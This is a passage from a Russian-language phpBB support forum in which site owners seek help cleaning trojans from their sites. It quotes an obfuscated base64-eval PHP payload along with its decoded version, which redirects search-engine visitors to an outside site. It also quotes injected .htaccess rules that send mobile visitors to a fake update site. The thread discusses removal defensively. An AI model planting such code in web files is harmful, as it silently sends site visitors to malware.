Как убить Трояна?
Правила форума
Местная Конституция | Шаблон запроса | Документация (phpBB3) | Переход на 3.0.6 и выше | FAQ | Как задавать вопросы | Как устанавливать расширения
Ваш вопрос может быть удален без объяснения причин, если на него есть ответы по приведённым ссылкам (а вы рискуете получить предупреждение
).
Местная Конституция | Шаблон запроса | Документация (phpBB3) | Переход на 3.0.6 и выше | FAQ | Как задавать вопросы | Как устанавливать расширения
Ваш вопрос может быть удален без объяснения причин, если на него есть ответы по приведённым ссылкам (а вы рискуете получить предупреждение

-
- phpBB 1.2.1
- Сообщения: 22
- Стаж: 18 лет 7 месяцев
- Благодарил (а): 1 раз
Как убить Трояна?
обнаружено: троянская программа Trojan-Downloader.VBS.Small.dh
Почистил файл - index.php. Не помогло. Что надо сделать чтобы найти и убить скрипт?
Спасибо.
ОТВЕТ:
- проверяемся на вирусы
- меняем ВСЕ пароли и не храним их в FTP-клиенте.
- чистим файлы Index.* или заливаем из бэкапа.
http://virusinfo.info/pravila.html
Почистил файл - index.php. Не помогло. Что надо сделать чтобы найти и убить скрипт?
Спасибо.
ОТВЕТ:
- проверяемся на вирусы
- меняем ВСЕ пароли и не храним их в FTP-клиенте.
- чистим файлы Index.* или заливаем из бэкапа.
http://virusinfo.info/pravila.html
-
- Former team member
- Сообщения: 12113
- Стаж: 18 лет 2 месяца
- Откуда: Калининград не Кенигсберг
- Благодарил (а): 36 раз
- Поблагодарили: 1526 раз
Re: Как убить Трояна?
Татьяна5
Много ли у вас там модов стоит?
Много ли у вас там модов стоит?
Скачайте все на локальный компьютер и сравнивайте файлы с дистрибутивом. WinMerge вам в помощь.Татьяна5 писал(а):как хоть выловить код вируса (без перезаливки всех файлов)?
Общие ошибки новичков (07.11.2005) & Как задавать вопросы
Мини FAQ
Если ничто другое не помогает, прочтите, наконец, инструкцию!
"Никакая инструкция не может перечислить всех обязанностей должностного лица, предусмотреть все отдельные случаи и дать вперёд соответствующие указания, а поэтому господа инженеры должны проявить инициативу и, руководствуясь знаниями своей специальности и пользой дела, принять все усилия для оправдания своего назначения".
Циркуляр Морского технического комитета №15 от 29.11.1910 г.
-
- Former team member
- Сообщения: 2500
- Стаж: 16 лет 1 месяц
- Откуда: 56°20′02″ с. ш. 36°42′45″ в. д.
- Поблагодарили: 26 раз
Re: Как убить Трояна?
Татьяна5, проверил в двух браузерах — редиректа нет.
В файлах ничего подозрительного не заметил.
В файлах ничего подозрительного не заметил.
-
- phpBB 3.0.7-PL1
- Сообщения: 2535
- Стаж: 15 лет 7 месяцев
- Поблагодарили: 71 раз
Как убить Трояна?
Подтверждаю. На данный момент редиректа нет. Проверено в четырех браузерах.
Любовь и боль, покой и бой я как любой несу с собой…
-
- Поддержка
- Сообщения: 12752
- Стаж: 13 лет 8 месяцев
- Благодарил (а): 159 раз
- Поблагодарили: 2276 раз
-
- Former team member
- Сообщения: 2317
- Стаж: 15 лет 5 месяцев
- Благодарил (а): 20 раз
- Поблагодарили: 221 раз
Re: Как убить Трояна?
Внимание! на radikal-е снова обнаружен троян, осторожней с этим сервисом
Помощь в ЛС/email только за WM или ЮMoney
-
- Former team member
- Сообщения: 814
- Стаж: 15 лет 1 месяц
- Откуда: Родной Гондурас ;)
- Благодарил (а): 28 раз
- Поблагодарили: 13 раз
Re: Как убить Трояна?
Заимел в
Если по русски, вот:
Компутер стерилен как нераспакованный презерватив. Хостер, штоли? Поменял пароль, будем посмотреть.
*.php
такую прелесть:
Скрытый текст
Код: Выделить всё
<?php eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokbmNjdj1oZWFkZXJzX3NlbnQoKTsNCmlmICghJG5jY3Ypew0KJHJlZmVyZXI9JF9TRVJWRVJbJ0hUVFBfUkVGRVJFUiddOw0KJHVhPSRfU0VSVkVSWydIVFRQX1VTRVJfQUdFTlQnXTsNCmlmIChzdHJpc3RyKCRyZWZlcmVyLCJ5YWhvbyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJpbmciKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJyYW1ibGVyIikgb3Igc3RyaXN0cigkcmVmZXJlciwiZ29nbyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImxpdmUuY29tIilvciBzdHJpc3RyKCRyZWZlcmVyLCJhcG9ydCIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsIm5pZ21hIikgb3Igc3RyaXN0cigkcmVmZXJlciwid2ViYWx0YSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJlZ3VuLnJ1Iikgb3Igc3RyaXN0cigkcmVmZXJlciwic3R1bWJsZXVwb24uY29tIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYml0Lmx5Iikgb3Igc3RyaXN0cigkcmVmZXJlciwidGlueXVybC5jb20iKSBvciBwcmVnX21hdGNoKCIveWFuZGV4XC5ydVwveWFuZHNlYXJjaFw/KC4qPylcJmxyXD0vIiwkcmVmZXJlcikgb3IgcHJlZ19tYXRjaCAoIi9nb29nbGVcLiguKj8pXC91cmxcP3NhLyIsJHJlZmVyZXIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsIm15c3BhY2UuY29tIikgb3Igc3RyaXN0cigkcmVmZXJlciwiZmFjZWJvb2suY29tIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYW9sLmNvbSIpKSB7DQppZiAoIXN0cmlzdHIoJHJlZmVyZXIsImNhY2hlIikgb3IgIXN0cmlzdHIoJHJlZmVyZXIsImludXJsIikpewkJDQoJCWhlYWRlcigiTG9jYXRpb246IGh0dHA6Ly9zaXRlLnBvcnRyZWxheS5jb20vIik7DQoJCWV4aXQoKTsNCgl9DQp9DQp9"));
Скрытый текст
Код: Выделить всё
error_reporting(0);
$nccv=headers_sent();
if (!$nccv){
$referer=$_SERVER['HTTP_REFERER'];
$ua=$_SERVER['HTTP_USER_AGENT'];
if (stristr($referer,"yahoo") or stristr($referer,"bing") or stristr($referer,"rambler") or stristr($referer,"gogo") or stristr($referer,"live.com")or stristr($referer,"aport") or stristr($referer,"nigma") or stristr($referer,"webalta") or stristr($referer,"begun.ru") or stristr($referer,"stumbleupon.com") or stristr($referer,"bit.ly") or stristr($referer,"tinyurl.com") or preg_match("/yandex\.ru\/yandsearch\?(.*?)\&lr\=/",$referer) or preg_match ("/google\.(.*?)\/url\?sa/",$referer) or stristr($referer,"myspace.com") or stristr($referer,"facebook.com") or stristr($referer,"aol.com")) {
if (!stristr($referer,"cache") or !stristr($referer,"inurl")){
header("Location: http://site.portrelay.com/");
exit();
}
}
}
-
- Former team member
- Сообщения: 2500
- Стаж: 16 лет 1 месяц
- Откуда: 56°20′02″ с. ш. 36°42′45″ в. д.
- Поблагодарили: 26 раз
Re: Как убить Трояна?
Хостеру незачем заниматься такими глупостями. Ищи дырявые скрипты у себя. И ищи подозрительные и новые файлы — ты привёл только код полезной нагрузки, но не бекдор, который наверняка должен быть.
Ну и да, с чего ты взял, что компутер стерилен?
Ну и да, с чего ты взял, что компутер стерилен?
-
- Former team member
- Сообщения: 814
- Стаж: 15 лет 1 месяц
- Откуда: Родной Гондурас ;)
- Благодарил (а): 28 раз
- Поблагодарили: 13 раз
Re: Как убить Трояна?
Я ж не гворю, что намеренно.MIT писал(а):Хостеру незачем заниматься такими глупостями
Это понятно, но пока не реально - праздники, блин.MIT писал(а):Ищи дырявые скрипты у себя. И ищи подозрительные и новые файлы
Конечно, со 100% уверенностью сказать ничего нельзя. Но не давно перестановленная винда сминимальным набором софта аля: офис, ноутпад++, тотал, гимп... , и отсутствие привычки серфить где непопадя, придают некоторую уверенностьMIT писал(а):Ну и да, с чего ты взял, что компутер стерилен?
-
- Бывший член :)
- Сообщения: 2925
- Стаж: 19 лет 11 месяцев
- Благодарил (а): 19 раз
- Поблагодарили: 30 раз
- Забанен: Бессрочно
Re: Как убить Трояна?
Тогда нет. Тогда искать шелл. Влезть могли разными способами, сейчас уже не сказать как. Если не получается самостоятельно решить - пиши в личку, помогу. Опыт имеется.
Изменены все файлы .htaccess - уязвимость скриптов?
Сегодня были дополнены все файлы .htaccess на сайте, несмотря на запрет записи (444), следующими строчками:
Примерно такие же записи были дополнены в .htaccess - 18 декабря 2012г.
Хостер говорит, что это уязвимость ваших скриптов. Что атрибут 444 на 644 могут поменять скрипты.
Что интересно - у измененных файлов не поменялась дата изменения, она осталась 19.12.12 - эта та дата, когда я восстановил все файлы .htaccess после случая 18.12.12. Скрипты тоже могут такое вытворять?
Также заметил, что в файлах .htaccess изменен формат переноса строк с UNIX на WINDOWS.
Сам я создал и захожу на хостинг через виртуальную машину, где установлен Windows 7, антивирус Касперского и ftp-клиент FileZilla Client. Пароли хранятся только в зашифрованном архиве, который после его закрытия затирает временную папку. В браузере и ftp-клиенте пароли (для захода на хостинг) не сохраняю.
Есть подозрения на ftp-клиент FileZilla Client, который утащил мои пароли. Хотя хостер настаивает, что это уязвимость ваших скриптов. А на самом деле как узнать кто, откуда, каким способом меняет файлы .htaccess?
Код: Выделить всё
RewriteEngine on
RewriteCond %{HTTP_USER_AGENT} (android|midp|j2me|symbian|series\ 60|symbos|windows\ mobile|windows\ ce|ppc|smartphone|blackberry|mtk) [NC]
RewriteCond %{HTTP_USER_AGENT} !(accoona|ia_archiver|antabot|ask\ jeeves|baidu|eltaindexer|feedfetcher|gamespy|gigabot|googlebot|gsa-crawler|grub-client|gulper|slurp|mihalism|msnbot|worldindexer|ooyyo|pagebull|scooter|w3c_validator|jigsaw|webalta|yahoofeedseeker|mmcrawler|yandexbot|yandeximages|yandexvideo|yandexmedia|yandexblogs|yandexaddurl|yandexfavicons|yandexdirect|yandexmetrika|yandexcatalog|yandexnews|yandeximageresizer) [NC]
RewriteRule (.*) http://critical-upd.ru/?upd&source=.htaccess [L,R=302] #
Хостер говорит, что это уязвимость ваших скриптов. Что атрибут 444 на 644 могут поменять скрипты.
Что интересно - у измененных файлов не поменялась дата изменения, она осталась 19.12.12 - эта та дата, когда я восстановил все файлы .htaccess после случая 18.12.12. Скрипты тоже могут такое вытворять?
Также заметил, что в файлах .htaccess изменен формат переноса строк с UNIX на WINDOWS.
Сам я создал и захожу на хостинг через виртуальную машину, где установлен Windows 7, антивирус Касперского и ftp-клиент FileZilla Client. Пароли хранятся только в зашифрованном архиве, который после его закрытия затирает временную папку. В браузере и ftp-клиенте пароли (для захода на хостинг) не сохраняю.
Есть подозрения на ftp-клиент FileZilla Client, который утащил мои пароли. Хотя хостер настаивает, что это уязвимость ваших скриптов. А на самом деле как узнать кто, откуда, каким способом меняет файлы .htaccess?
-
- phpBB 3.0.7-PL1
- Сообщения: 2535
- Стаж: 15 лет 7 месяцев
- Поблагодарили: 71 раз
Изменены все файлы .htaccess - уязвимость скриптов?
Только на астральном уровне.
На какие конкретно скрипты грешит хостер? Так можно от любой проблемы отмазаться: «это ваши скрипты». А какие скрипты-то?
На какие конкретно скрипты грешит хостер? Так можно от любой проблемы отмазаться: «это ваши скрипты». А какие скрипты-то?
Любовь и боль, покой и бой я как любой несу с собой…
Re: Изменены все файлы .htaccess - уязвимость скриптов?
Я тоже задавал такой вопрос, ответ был:
Это уязвимость скриптов. Сайт сломан через дыры в скриптах а не через пароли.
У нас возможности отслеживать ваши скрипты нет.
А как еще можно изменить файлы .htaccess не затронув дату изменения?
Это уязвимость скриптов. Сайт сломан через дыры в скриптах а не через пароли.
У нас возможности отслеживать ваши скрипты нет.
А как еще можно изменить файлы .htaccess не затронув дату изменения?
-
- phpBB 3.0.7-PL1
- Сообщения: 2535
- Стаж: 15 лет 7 месяцев
- Поблагодарили: 71 раз
Изменены все файлы .htaccess - уязвимость скриптов?
Скрипты форумного движка phpBB3 не позволяют просто так изменять какие-либо файлы. Тем более,
Что еще есть на сайте/форуме?
.htaccess
. Это все, что я знаю.Что еще есть на сайте/форуме?
Любовь и боль, покой и бой я как любой несу с собой…